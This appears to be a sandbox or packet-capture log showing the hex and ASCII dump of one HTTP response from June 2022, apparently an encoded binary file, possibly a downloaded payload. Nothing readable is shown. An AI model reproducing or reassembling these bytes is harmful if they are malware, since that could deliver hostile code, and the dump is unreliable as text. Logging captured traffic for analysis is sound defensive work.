                                Data Ascii: % %%%%%%%%Pf 1^'X'%%%^77%%%d 1u%%X5'f -uh 8'%%fX! Z%%^'N?d%%%h$e%P%%%hP855)R 1'%hAxe%8f8d !6:%%e%he%he%he%he%$skss-PUsX%((1Z^=Z?Uc%_
                                2022-06-26 07:43:09 UTC366INData Raw: da 36 a5 da 08 50 27 b4 05 a5 d6 25 99 29 ba 1a c6 27 b6 1a 76 ba 05 8b 84 e4 25 50 2b d5 dc c6 29 b8 fd 0c e5 76 b6 07 b4 48 1d 76 c6 7b d1 2d e5 99 29 61 45 99 d2 73 9e 0c e5 0c f7 d1 51 5f 29 2f 4e ea ff e8 a1 9c 1c 25 64 20 19 ff 20 19 67 c6 0f 73 9e 0c e5 0c f7 af 33 a5 d4 06 99 e0 a5 d4 08 50 dc 6b af 2b 51 5f 29 2f 4e 33 6b 46 f7 2f dc e7 5c 1f 19 dc 25 25 97 0f a5 d4 08 50 27 d2 ff 9e 36 83 3a 66 c0 38 9e 30 66 11 5e e9 e5 2e 66 fd 8f 25 8f ea 8f 25 68 30 2d 68 20 e5 0e a4 0d f5 d4 da da 66 ed 68 30 e5 66 9e 0d 31 8a da da 36 66 c0 38 e7 31 25 b5 30 66 11 5e e9 e5 2e 66 fd 8f 25 8f 25 8f 25 68 30 2d 68 20 e5 8c dc 0d c5 d4 da da 66 ed 68 30 e5 66 9e 0d 01 d3 da da 36 66 c0 38 e7 2d 25 b5 2e 7b 66 17 66 fd 66 9e 0d 72 d7 da da 66 fb 0e a4 0d 9b 23
                                Data Ascii: 6P'%)'v%P+)vHv{-)aEsQ_)/N%d gs3Pk+Q_)/N3kF/\%%P'6:f80f^.f%%h0-h fh0f16f81%0f^.f%%%h0-h fh0f6f8-%.{fffrf#
                                2022-06-26 07:43:09 UTC368INData Raw: 66 ff 60 b6 99 3f 66 30 2d 66 b7 21 23 da da 66 28 2d 68 b9 ec 25 da da da 66 a6 0d fb b9 da da 66 20 2d dc bd 21 23 da da 36 38 9e 66 e5 30 66 11 2e 66 fd 66 20 2d 75 66 9e 0d d2 86 da da 66 f5 66 9e 0d c7 da da da 34 36 38 9e 66 e5 30 66 11 5e e9 05 2e 7b 66 17 66 fd 66 20 2d 75 8f 29 64 50 05 eb 20 09 25 64 38 0d eb 20 11 25 68 20 05 75 8f dc 94 b1 9c 1c 25 68 20 15 df 35 25 25 25 0d d9 ca da da 66 f5 68 20 15 0d 7f da da da 34 83 36 66 c0 38 9e 68 65 25 30 66 11 2c 66 20 2d 5e e5 21 66 35 64 30 21 c6 27 da 25 66 35 af 37 66 28 2d 5f 2c d6 99 17 66 25 06 20 21 65 66 30 2d 64 67 19 34 38 9e 66 e5 30 66 11 66 20 2d a5 9d c8 25 50 4f 66 20 2d 66 65 2d da 95 31 da 95 2d 66 20 2d 68 6d 13 66 20 2d 68 75 15 66 20 2d 5e e5 17 0d 70 23 da da 66 20 2d eb 65 c8
                                Data Ascii: f`?f0-f!#f(-h%ff -!#68f0f.ff -ufff468f0f^.{fff -u)dP %d8 %h u%h 5%%%fh 46f8he%0f,f -^!f5d0!'%f57f(-_,f% !ef0-dg48f0ff -%POf -fe-1-f -hmf -huf -^p#f -e
                                2022-06-26 07:43:09 UTC369INData Raw: 25 0d ca 1f da da 34 c4 ed e0 25 25 30 0d 0a d6 da da 34 30 0d 7d d6 da da 34 66 20 2d 75 30 68 30 fd 66 20 19 0d 9a d6 da da 34 66 20 fd 0d c7 1f da da 34 c4 76 e0 25 25 30 0d 27 d6 da da 34 30 0d 06 d6 da da 34 66 20 2d 75 30 68 30 f9 66 20 19 0d 23 21 da da 34 66 20 f9 0d 50 1f da da 34 c4 93 e0 25 25 30 0d b0 1f da da 34 30 0d 23 1f da da 34 66 20 19 6d 5e 0d 27 97 29 99 3d c6 55 66 20 2d 75 ea 92 20 15 66 30 19 0d 89 1f da da 34 c4 18 e0 25 25 66 20 2d 75 ea 92 20 15 66 29 60 d1 0b 1c 25 0d 4f 1f da da 34 c4 fe e0 25 25 66 20 2d 75 ea 92 20 15 66 29 60 01 0b 1c 25 0d 35 1f da da 34 c4 e4 e0 25 25 30 0d 95 1f da da 34 66 20 19 6d 5e 0d 27 97 2f 99 00 6d 99 24 6d 99 48 c6 5a 30 0d ab 1f da da 34 66 20 2d 75 ea 92 20 13 66 30 19 0d d4 d4 da da 34 c4 f7
                                Data Ascii: %4%%040}4f -u0h0f 4f 4v%%0'404f -u0h0f #!4f P4%%040#4f m^')=Uf -u f04%%f -u f)`%O4%%f -u f)`%54%%04f m^'/m$mHZ04f -u f04
                                2022-06-26 07:43:09 UTC370INData Raw: 66 20 2d 75 dd c1 0b 1c 25 df dc 25 25 25 0d 00 d0 da da 34 c6 40 66 2b 64 20 01 c6 fa 66 2b af 25 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e e6 66 2b 0d 6b f8 25 25 64 2b c6 27 da 2b 66 2b a5 5d 25 99 e4 66 2b af 25 5f 20 d6 50 ac 66 20 2d 75 66 3b 06 30 01 66 20 01 0d b6 19 da da 34 66 2b a5 5d 25 99 3b da 2b c6 37 66 20 2d 75 68 20 d6 df dc 25 25 25 0d e3 19 da da 34 66 2b a5 5d 25 ea 60 ff 1d da da 66 20 2d da ad 1d 23 da da 0e e5 7f 34 34 89 64 35 8d f0 c7 65 25 68 20 f9 df 27 25 25 25 0d 1a c3 da da 9e c4 4c 72 da da c6 c6 3a 83 36 66 c0 38 9e 1c 28 0a 75 28 25 25 25 1c 0a 75 25 1c 28 75 28 25 25 25 25 1c 1c 1c 1c 25 25 25 25 1c 1c 1c 25 45 25 25 25 30 66 11 5c e9 1d 23 da da 2e 7b 66 ff 66 15 0e e5 64 60 21 23 da da 0e e5 64 60 1d 23 da da 60 b6 99 e6
                                Data Ascii: f -u%%%%4@f+d f+%%%%~=%Nf+k%%d+'+f+]%f+%_ Pf -uf;0f 4f+]%;+7f -uh %%%4f+]%`f -#44d5e%h '%%%Lr:6f8(u(%%%u%(u(%%%%%%%%%E%%%0f\#.{ffd`!#d`#`
                                2022-06-26 07:43:09 UTC372INData Raw: 13 8b 66 20 17 8b 64 20 11 c6 5b 8b 66 58 15 af 20 c4 ad 20 0d 8b 66 20 17 8b 64 20 13 8b 66 20 19 8b 64 20 11 c6 3f 8b 66 58 19 af 20 c6 ad 20 0d 8b 66 20 17 8b 64 20 13 8b 66 20 15 8b 64 20 11 5e 58 21 25 a3 33 30 ea 92 a2 0d e2 23 da da 34 66 1d c6 95 a5 58 0d 27 52 8f 0d 46 ca da da ea 92 ed ea 92 e0 09 e5 1c 25 06 ed 66 9c 2c 94 89 25 25 25 74 d2 d4 34 8b 46 e5 89 8b de 1d 8b 5e 18 09 e5 1c 25 25 9b 61 ea 92 a2 16 ed a3 10 8b 5e a2 89 c6 0a 0d 55 ca da da 66 1d a5 58 1b dc 50 37 8b 66 20 19 8b 64 20 11 8b 66 20 17 8b 64 20 13 c6 35 8b 66 20 19 8b 64 20 13 8b 66 20 17 8b 64 20 11 66 ae af e8 6c 0b 1c 25 66 eb 0d 3e 21 da da 66 ae 66 eb 0d 3b d6 da da a5 18 79 c2 1c 25 25 ea a9 8e 25 25 25 66 f0 b9 0b 1c 25 dd d5 cd 65 25 0d f4 c3 da da 60 e5 ea a9 76
                                Data Ascii: f d [fX f d f d ?fX f d f d ^X!%30#4fX'RF%f,%%%t4F^%%a^UfXP7f d f d 5f d f d fl%f>!ff;y%%%%%f%e%`v
                                2022-06-26 07:43:09 UTC373INData Raw: da da 66 9e 0d d4 b9 da da c6 e4 66 9e 66 fb 0d 77 b9 da da 83 36 66 c0 38 e7 29 25 66 e5 2e 7b 32 2c 66 b4 66 17 66 1d 8f 27 68 69 49 29 75 7b 32 0d 29 dd da da 60 e5 a3 e0 af 29 49 c6 27 66 9e 7f 3a 83 36 9e 30 66 11 2c 2e 7b 32 64 28 21 66 1f 66 15 66 38 2d 2e 66 20 35 66 65 21 0e a4 66 fb 0d 46 da da da 5e 16 25 50 e8 66 20 21 66 29 dd 66 ae 0d 58 d7 da da 3a 83 36 34 38 e7 2d 25 b5 30 66 11 0e a4 2c 2c 2c 2c 2c 2c 2e 7b 32 0e e5 30 8d 86 88 65 25 89 da 55 89 64 45 0d a2 92 da da 64 20 21 96 dc 25 25 25 e3 d5 0b 1c 25 9a 05 0b 1c 25 30 8f e6 68 20 19 75 94 b5 9c 1c 25 66 ae 6f 68 1e 69 6d 0d 54 da da da 34 66 30 19 66 eb 0d b3 6e da da 30 8f e6 68 20 15 75 94 e5 9c 1c 25 66 ae 6f 68 1e 5d 6d 0d 7b da da da 34 66 30 15 66 a2 0d 46 6e da da 1e 5e a2 29
                                Data Ascii: fffw6f8)%f.{2,fff'hiI)u{2)`)I'f:60f,.{2d(!fff8-.f 5fe!fF^%Pf !f)fX:648-%0f,,,,,,.{20e%UdEd !%%%%%0h u%fohimT4f0fn0h u%foh]m{4f0fFn^)
                                2022-06-26 07:43:09 UTC374INData Raw: 7b 0d a6 8e da da 5c 98 01 21 da da 25 35 25 25 50 41 8d e0 dc 25 25 68 60 0f d8 da da 75 66 60 f5 21 da da 75 0d 9a d7 da da 60 e5 50 fe 8d e0 dc 25 25 68 60 0f d8 da da 75 7c 8d 0b 1c 25 75 0d c9 d7 da da 66 eb 0d 68 da da da 64 20 19 c6 e4 06 90 f5 21 da da 64 50 19 68 60 0f d8 da da d7 81 0d b7 33 25 25 66 f5 67 68 60 ca 23 da da 94 29 dc 25 25 0d 22 ae da da dd 09 d7 65 25 64 20 21 dd 09 d7 65 25 64 20 1d 66 9e 66 f0 d5 4a 65 25 0d 53 a9 da da a9 e5 99 04 66 1e 29 0d fb b7 da da 64 20 21 66 20 21 0d c6 f7 da da 60 e5 99 37 66 30 21 a5 a1 27 da 53 99 2d dd 0d d7 65 25 64 20 1d 8d 25 dc 25 25 68 60 0f 21 da da 75 7c 5d f5 1c 25 66 65 29 75 7c 8d 0b 1c 25 0d d3 7c da da 75 0d 75 8e da da 68 70 c9 d6 da da 66 de 0d 8a 5c da da 68 60 c9 d6 da da 64 60 c9
                                Data Ascii: {\!%5%%PA%%h`uf`!u`P%%h`u|%ufhd !dPh`3%%fgh`#)%%"e%d !e%d ffJe%Sf)d !f !`7f0!'S-e%d %%%h`!u|]%fe)u|%|uuhpf\h`d`
                                2022-06-26 07:43:09 UTC376INData Raw: da da 66 20 21 64 20 09 eb 20 0d e6 64 50 11 eb 20 15 e6 64 58 19 eb 20 1d 25 68 20 09 75 8f 27 68 30 05 7c 0d aa 1c 25 0d f2 cd da da 66 28 05 d7 dc 7c fd 52 65 25 0d 11 21 da da 66 fd 0e e5 7f 34 34 89 64 35 8d 06 92 65 25 68 20 05 0d e8 64 da da 68 20 21 0d e0 64 da da 9e c4 36 a7 da da c6 0d 66 9e 3a 83 36 66 c0 38 9e 64 f1 64 39 49 66 48 25 c4 56 a7 da da 9e 66 e5 30 66 11 0d 61 da da da 68 28 2d 5e 9c 29 66 30 2d 0d ff da da da 38 e7 29 25 66 e5 66 e8 e1 f3 1c 25 d7 dc 7c 5d 9d 65 25 0d 23 21 da da 0d 20 a7 da da 9e 66 25 18 b7 25 25 e5 5a 51 99 34 18 b3 25 25 e5 5a f0 99 2e 08 e0 25 25 e5 99 30 08 62 25 25 25 99 61 6d 99 6d c6 30 e0 4c da da 1a 5e 0d 27 97 0e 99 12 c6 22 18 bb 25 25 e5 5a ec 99 10 08 6e 25 25 e5 99 4d 6d 99 ee 6d 99 3b c6 0a 08 d8
                                Data Ascii: f !d dP dX %h u'h0|%f(|Re%!f44d5e%h dh !d6f:6f8dd9IfH%Vf0fah(-^)f0-8)%ff%|]e%#! f%%%ZQ4%%Z.%%0b%%%amm0L^'"%%Zn%%Mmm;
                                2022-06-26 07:43:09 UTC377INData Raw: 94 a5 25 25 25 0d 48 ab da da 5c e9 b9 25 25 25 9e 66 e5 7b 32 66 1f 0e f7 60 e5 99 8b a5 61 5d 25 99 85 60 da 50 39 af 25 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e 71 d7 dc c6 6d 66 d2 73 c6 dc 73 60 1b a1 37 af 31 55 5c bc da 25 25 25 ea 7e e8 3d 9c 1c 25 97 c4 66 aa 06 f3 5c bc dc 25 25 a5 54 e0 24 5e a4 23 1c 60 a4 50 29 d7 27 c6 ee af 29 5d 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e 27 d7 dc 66 e7 3a 83 9e 68 65 25 2e 7b 66 17 66 fd 0e e5 a5 18 79 c2 1c 25 25 99 ea 66 9e 0d 49 ad da da 66 fb 6f 0d 8d da da da 83 36 9e b5 0e a4 a5 18 79 c2 1c 25 25 99 e2 0d 79 da da da 66 ed 66 9c 9e 68 65 25 2e 7b 66 17 66 fd 66 9e 0d ce 60 da da 16 15 a3 e4 66 9e 0d 0d 60 da da 66 15 66 fb 66 9e 0d e0 25 25 25 83 36 9e 66 e5 2e 7b 32 30 66 1f 66 15 0e c8 60 da a3 6b 66 eb
                                Data Ascii: %%%H\%%%f{2f`a]%`P9%%%%~=%Nqmfss`71U\%%%~=%f\%%T$^#`P)')]%%%~=%N'f:he%.{ffy%%fIfo6y%%yffhe%.{fff`f`fff%%%6f.{20ff`kf
                                2022-06-26 07:43:09 UTC378INData Raw: 7c 6d c2 1c 25 0d 99 da da da 75 0d 9b c7 da da 0e 1b c6 04 af 69 12 2b af 81 12 e2 4f fd 97 3f 1e ad 20 da af 20 da 00 da 25 25 25 ea 86 e0 3d 9c 1c 25 23 20 da 23 a6 50 0f 5e eb 27 5e 23 31 58 2f af 69 12 2b 2f 69 12 e2 50 ed 3a 83 36 34 38 9e 7c 71 c2 1c 25 5e 1d fa 52 e2 ea 7e e0 35 9e 1c 25 ea b7 e5 9e 68 65 25 30 66 11 5c e9 89 23 da da 2e 7b 32 a2 e0 6d c2 1c 25 e4 29 25 25 a2 e0 71 c2 1c 25 e4 25 25 25 a2 e0 75 c2 1c 25 dc 25 25 25 0d 48 c7 da da 60 e5 99 e0 7e 6d c2 1c 25 8b 60 e5 99 f6 66 f5 8b 5c 07 da de ea 92 f7 64 f0 71 c2 1c 25 ea 92 e5 9c 0d 2f 7e 75 c2 1c 25 e3 61 9e 65 25 9a 3d 9c 1c 25 94 2d 25 25 25 ce 80 5e 18 f5 e5 1c 25 27 ea 60 88 25 25 25 0d 48 da da da a9 e5 99 ee eb e0 30 c2 1c 25 25 eb e0 79 c2 1c 25 25 c4 9a 25 25 25 30 0d 15
                                Data Ascii: |m%ui+O? %%%=%# #P^'^#1X/i+/iP:648|q%^R~5%he%0f\#.{2m%)%%q%%%%u%%%%H`~m%`f\dq%/~u%ae%=%-%%%^%'`%%%H0%%y%%%%%0
                                2022-06-26 07:43:09 UTC380INData Raw: 25 da 00 59 ce 1c 25 66 e5 30 66 11 5e e9 11 2e 0e e5 64 20 11 0e e5 30 8d 91 a2 65 25 89 da 55 89 64 45 0d 20 78 da da 66 fd 60 b6 99 12 64 38 15 eb 20 19 25 68 30 11 66 9e 0d af 09 da da 66 20 11 64 20 1d eb 20 21 e6 68 20 15 75 8f dc 66 e8 cd aa 1c 25 d7 dc 7c 15 9d 65 25 0d 9d c8 da da 66 f5 c6 39 66 e8 45 f5 1c 25 d7 dc 7c 15 9d 65 25 0d 4b c8 da da 66 f5 64 7f 31 66 e7 0d 8b 97 da da 0e e5 7f 34 34 89 64 35 8d 4e a2 65 25 68 20 11 0d 98 9d da da 9e c4 ee 97 da da c6 15 36 66 c0 38 9e 2e 66 fd 60 b6 50 e0 0d 7d da da da 66 9e 36 9e 2e 7b 2c 96 39 9e 1c 25 66 19 c6 3b 66 de 64 2b 66 2b 66 25 64 de df 2d 25 25 25 66 2b 0d 5f 87 da da 5e 16 25 50 c0 7f 83 36 9e b5 2e 8d 11 a2 65 25 0d 7c c1 da da 66 fd 60 b6 99 35 8d 21 a2 65 25 2e 0d bd c1 da da 7e 61
                                Data Ascii: %Y%f0f^.d 0e%UdE xf`d8 %h0ff d !h uf%|e%f9fE%|e%Kfd1f44d5Ne%h 6f8.f`P}f6.{,9%f;fd+f+f%d-%%%f+_^%P6.e%|f`5!e%.~a
                                2022-06-26 07:43:09 UTC381INData Raw: da da 66 29 49 da 6d 31 66 29 49 5e 9d 31 25 50 6d 66 f9 66 1e 45 0d e4 d8 da da 0d e9 72 da da 16 1e 49 99 59 68 1e 31 0d 92 d6 da da 66 ed 5c d4 da da 25 25 50 e4 66 9e 0d 43 23 da da c6 f4 60 a4 5a f0 66 9c 94 da da 25 25 74 d2 d4 60 f7 50 e2 66 9e 0d de 23 da da 7f 36 9e 66 35 0e a4 64 2d 66 e7 0d e2 8d da da 9e 66 e5 30 66 11 5e e9 19 2e 66 fd 77 0d 2c bd da da 64 20 19 0e e5 30 8d 2f a8 65 25 89 da 55 89 64 45 b4 58 23 0e e5 30 8d 11 f1 65 25 89 da 55 89 64 45 66 9e 0d 3d 9d da da 75 0d ef 72 da da 64 20 1d 0e e5 7f 34 34 89 64 35 8d ce f1 65 25 b6 07 b4 48 23 9e c4 6e 91 da da c6 ce 0e e5 7f 34 34 89 64 35 8d ec a8 65 25 66 20 19 75 0d ca 72 da da 9e c4 50 91 da da c6 ca 66 20 1d 36 66 c0 38 9e 68 65 25 f8 25 25 25 31 9e 1c 25 b1 aa 1c 25 29 9e 1c
                                Data Ascii: f)Im1f)I^1%PmffErIYh1f\%%PfC#`Zf%%t`Pf#6f5d-ff0f^.fw,d 0/e%UdEX#0e%UdEf=urd 44d5e%H#n44d5e%f urPf 6f8he%%%%1%%)
                                2022-06-26 07:43:09 UTC382INData Raw: 65 dd 41 a8 65 25 0d 45 91 da da dd 2d f3 65 25 0d 63 91 da da a5 18 40 0b 1c 25 25 99 ea dd 5d 9c 1c 25 df 0d ac 65 25 0d ef 93 da da 0d e4 c4 da da 0d 2d 0f da da 0d ce d0 da da 0d bb cc da da 0e e5 7f 34 34 89 64 35 8d b6 ac 65 25 9e c4 86 42 da da c6 1d 38 9e 25 25 25 da da da da 27 25 25 25 55 9d 25 25 2e 7b 66 17 66 fd 16 ce 58 33 66 9e 06 eb 0d b4 81 da da de eb 83 36 9e 66 eb 06 9e 0d a6 81 da da de 9e 83 36 9e 66 e5 30 66 11 0e e5 30 8d 14 f7 65 25 89 da 55 89 64 45 da e0 cd c2 1c 25 0e e5 7f 34 34 89 64 35 8d 65 f7 65 25 9e c4 6b 42 da da c6 1d 38 9e 66 e5 5e 08 cd c2 1c 25 dc 9e 30 66 11 0e e5 30 8d 4c f7 65 25 89 da 55 89 64 45 da e0 d1 c2 1c 25 0e e5 7f 34 34 89 64 35 8d 9d f7 65 25 9e c4 33 42 da da c6 1d 38 9e 66 e5 5e 08 d1 c2 1c 25 dc 9e
                                Data Ascii: eAe%E-e%c@%%]%e%-44d5e%B8%%%'%%%U%%.{ffX3f6f6f0f0e%UdE%44d5ee%kB8f^%0f0Le%UdE%44d5e%3B8f^%
                                2022-06-26 07:43:09 UTC384INData Raw: 15 66 9e 36 34 38 e7 35 25 b5 da 00 6d ce 1c 25 66 e5 da 00 69 ce 1c 25 66 e5 da 00 65 ce 1c 25 66 e5 da 00 61 ce 1c 25 66 e5 30 66 11 2c 2e 7b 66 ff 66 15 64 38 21 66 20 2d 5e 9d 21 25 99 f4 7b 66 20 2d 66 65 21 75 0d 18 68 da da 64 20 21 5e 58 21 25 50 de 64 38 21 66 20 21 83 36 34 38 9e b5 30 66 11 2c 8d 5d b4 65 25 0d 37 68 da da 64 20 21 30 df c9 f7 65 25 dd 6d b4 65 25 0d 82 da da da 34 7e d5 c2 1c 25 30 df f9 f7 65 25 dd 81 b4 65 25 0d 6c da da da 34 7e d9 c2 1c 25 30 df f9 f7 65 25 dd 89 b4 65 25 0d 56 da da da 34 7e dd c2 1c 25 30 df 05 f7 65 25 dd 91 b4 65 25 0d 40 da da da 34 7e e1 c2 1c 25 30 df 05 f7 65 25 dd 99 b4 65 25 0d 2a da da da 34 7e e5 c2 1c 25 30 df 05 f7 65 25 dd a1 b4 65 25 0d 14 da da da 34 7e e9 c2 1c 25 30 df 05 f7 65 25 dd a9
                                Data Ascii: f6485%m%fi%fe%fa%f0f,.{ffd8!f -^!%{f -fe!uhd !^X!%Pd8!f !6480f,]e%7hd !0e%me%4~%0e%e%l4~%0e%e%V4~%0e%e%@4~%0e%e%*4~%0e%e%4~%0e%
                                2022-06-26 07:43:09 UTC385INData Raw: 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f0 20 7b 3c 97 44 3c 93 99 79 54 95 40 1e 3c 4e 99 20 97 97 4a 97 66 e5 e1 01 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 e1 01 65 25 31 25 25 25 a1 52 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f0 20 7b 3c 97 44 3c 93 99 2a 9b 40 97 8b 91 4a 52 20 97 97 4a 97 66 e5 45 b8 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 45 b8 65 25 31 25 25 25 a1 52 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f2 20 7b 3c 97 44 3c 93 99 24 93 9b 3c 91 44 89 1c 97 42 20 97 97
                                Data Ascii: %[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<yT@<N Jfe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%e%1%%%Re%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<*@JR JfEe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Ee%1%%%Re%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<$<DB
                                2022-06-26 07:43:09 UTC389INData Raw: 25 68 20 21 0d c2 34 da da 9e c4 94 71 da da c6 15 36 34 38 9e 68 65 25 30 66 11 8f 25 2e 66 fd 0e e5 30 8d 37 c8 65 25 89 da 55 89 64 45 68 20 21 0d d3 53 25 25 66 9e 66 30 21 0d e9 63 25 25 0e e5 7f 34 34 89 64 35 8d f4 c8 65 25 68 20 21 0d f2 2e da da 9e c4 48 71 da da c6 15 36 34 38 9e 68 65 25 30 66 11 8f 25 2e 66 fd 0e e5 30 8d 83 c8 65 25 89 da 55 89 64 45 68 20 21 0d 3f 61 25 25 66 9e 66 30 21 0d 2d 1a 25 25 0e e5 7f 34 34 89 64 35 8d 40 c8 65 25 68 20 21 0d f6 48 da da 9e c4 fc 71 da da c6 15 36 34 38 9e 68 65 25 30 66 11 8f 25 2e 66 fd 0e e5 30 8d cf c8 65 25 89 da 55 89 64 45 68 20 21 0d 27 16 25 25 66 9e 66 30 21 0d b5 63 25 25 0e e5 7f 34 34 89 64 35 8d 8c c8 65 25 68 20 21 0d aa 91 da da 9e c4 b0 26 da da c6 15 36 34 38 9e 68 65 25 2e 7b 32
                                Data Ascii: %h !4q648he%0f%.f07e%UdEh !S%%ff0!c%%44d5e%h !.Hq648he%0f%.f0e%UdEh !?a%%ff0!-%%44d5@e%h !Hq648he%0f%.f0e%UdEh !'%%ff0!c%%44d5e%h !&648he%.{2
                                2022-06-26 07:43:09 UTC393INData Raw: da 57 89 64 47 66 20 21 8b 66 25 ea 92 f5 5e 1f 39 ea 62 a6 dc 25 25 da 49 70 3a d8 65 25 8e d8 65 25 eb d8 65 25 ca d8 65 25 27 23 65 25 39 23 65 25 4f 23 65 25 65 23 65 25 81 23 65 25 97 23 65 25 35 da 65 25 fe da 65 25 60 23 65 25 1f 23 65 25 35 da 65 25 fe da 65 25 fe da 65 25 bd 23 65 25 86 23 65 25 9a 23 65 25 ae 23 65 25 0b 23 65 25 a2 20 15 25 25 25 25 a2 20 19 25 25 25 25 c4 8d de 25 25 a5 18 45 9e 1c 25 25 99 e8 8b df 39 25 8b dd dc 25 0d 01 07 da da a2 20 15 25 25 25 25 a2 20 19 25 25 25 25 c4 1a de 25 25 66 20 21 ea 9a 65 2d 74 64 20 15 64 30 19 c4 51 de 25 25 66 20 21 66 65 2d 74 64 20 15 64 30 19 c4 3f de 25 25 66 20 21 b4 65 2d 0d a0 0a da da 64 20 15 64 30 19 c4 29 de 25 25 66 20 21 b8 65 2d 0d 8a 0a da da 64 20 15 64 30 19 c4 13 27 25 25
                                Data Ascii: WdGf !f%^9b%%Ip:e%e%e%e%'#e%9#e%O#e%e#e%#e%#e%5e%e%`#e%#e%5e%e%e%#e%#e%#e%#e%#e% %%%% %%%%%%E%%9%% %%%% %%%%%%f !e-td d0Q%%f !fe-td d0?%%f !e-d d0)%%f !e-d d0'%%
                                2022-06-26 07:43:09 UTC397INData Raw: 1c 25 c8 31 1c 25 c8 31 1c 25 c8 31 1c 25 b3 31 1c 25 c9 31 1c 25 92 31 1c 25 ef 31 1c 25 bc 31 1c 25 0e e5 64 20 1d c4 de dc 25 25 a5 18 45 9e 1c 25 25 99 e8 8b df 29 25 8b dd dc 25 0d 9b f9 da da 0e e5 64 20 1d c4 be 25 25 25 66 20 21 ba 65 2d b4 38 1d 76 c4 f9 25 25 25 66 20 21 b6 65 2d b4 38 1d 76 c4 a0 25 25 25 66 20 21 66 65 2d 64 20 1d c4 92 25 25 25 66 20 21 ea 9a 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c4 7c 25 25 25 66 20 21 ea e3 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c4 66 25 25 25 66 20 21 ea db 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c6 9d 66 20 21 ea 92 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c6 40 66 20 21 66 65 2d 64 20 11 0e e5 64 20 15 ba 48 11 b4 38 1d 76 c6 73 66 20 21 ba 8d 2d b4 38 1d 76 c6 67 0e e5 30 8d ec e8 1c 25 89 da 55 89 64 45 66 20 21 0d
                                Data Ascii: %1%1%1%1%1%1%1%1%d %%E%%)%%d %%%f !e-8v%%%f !e-8v%%%f !fe-d %%%f !e-d 8v|%%%f !e-d 8vf%%%f !e-d 8vf !e-d 8v@f !fe-d d H8vsf !-8vg0%UdEf !
                                2022-06-26 07:43:09 UTC401INData Raw: 3c da da 66 30 1d 66 eb 0d 0f fe da da c4 c2 de 25 25 b4 1e 2d 5e e9 19 b6 61 49 76 68 20 19 0d 16 50 da da 66 30 19 66 eb 0d a4 fe da da c4 eb de 25 25 b8 1e 2d 5e e9 19 b6 61 49 76 68 20 15 0d 3f 50 da da 66 30 15 66 eb 0d cd fe da da c4 80 de 25 25 da 4e 31 da 4e 2d 68 20 11 0d ac d6 da da 66 30 11 66 eb 0d 9a 00 da da c4 ad de 25 25 da 4e 31 da 4e 2d 68 20 0d 0d 11 d6 da da 66 30 0d 66 eb 0d c7 00 da da c4 46 de 25 25 68 20 09 75 66 1e 2d 94 da da da 5a df dc 25 25 25 0d 5a 06 da da 66 30 09 66 eb 0d 58 00 da da c4 6b de 25 25 68 30 05 8b 66 1e 2d 0d 09 d6 da da 66 30 05 66 eb 0d 87 00 da da c4 06 de 25 25 68 30 01 ea e3 1e 2d 0d 64 85 da da 66 30 01 66 eb 0d ee fe da da c4 35 de 25 25 68 30 fd 0e e5 af 1e 2d 0d 48 85 da da 66 30 fd 66 eb 0d d2 47 da
                                Data Ascii: <f0f%%-^aIvh Pf0f%%-^aIvh ?Pf0f%%N1N-h f0f%%N1N-h f0fF%%h uf-Z%%%Zf0fXk%%h0f-f0f%%h0-df0f5%%h0-Hf0fG
                                2022-06-26 07:43:09 UTC405INData Raw: 25 25 1e 50 97 97 40 93 3e 54 25 25 25 25 da da da da 29 25 25 25 69 3c 99 40 25 25 25 25 da da da da 2b 25 25 25 2a 91 40 2e 99 97 25 25 da da da da 2d 25 25 25 69 44 4e 95 3c 99 3e 8d 25 25 25 25 da da da da e0 25 25 25 20 97 97 4a 97 25 25 25 da da da da e2 25 25 25 67 4a 4a 91 40 3c 93 25 da da da da e2 25 25 25 7b 3c 97 44 3c 93 99 25 da da da da e2 25 25 25 30 93 46 93 4a 52 93 25 da da da da e2 25 25 25 69 40 3e 44 48 3c 91 25 da da da da de 25 25 25 49 55 6b 25 da da da da 2d 25 25 25 2e 8d 4a 97 99 24 93 99 25 25 25 25 da da da da 29 25 25 25 67 54 99 40 25 25 25 25 da da da da 29 25 25 25 32 4a 97 89 25 25 25 25 da da da da 2d 25 25 25 71 4a 93 42 32 4a 97 89 25 25 25 25 da da da da e0 25 25 25 24 93 99 5b 59 25 25 25 30 66 11 5c e9 1d d8 da da
                                Data Ascii: %%P@>T%%%%)%%%i<@%%%%+%%%*@.%%-%%%iDN<>%%%%%%% J%%%%%%gJJ@<%%%%{<D<%%%%0FJR%%%%i@>DH<%%%%IUk%-%%%.J$%%%%)%%%gT@%%%%)%%%2J%%%%-%%%qJB2J%%%%%%%$[Y%%%0f\
